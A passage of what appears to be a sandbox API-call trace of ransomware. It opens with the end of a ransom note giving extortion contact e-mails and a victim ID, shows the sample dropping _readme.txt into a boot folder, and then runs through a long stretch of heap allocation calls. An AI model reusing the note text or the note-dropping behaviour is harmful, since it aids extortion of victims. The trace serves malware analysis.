your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.811] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.811] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.811] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.812] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.812] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.812] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.812] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.812] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.812] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.812] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.812] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.812] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.812] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.812] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.812] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.812] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.813] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.813] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.815] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.815] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.816] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.816] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.817] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.817] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.818] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.818] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.819] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.819] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.820] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.820] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.821] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 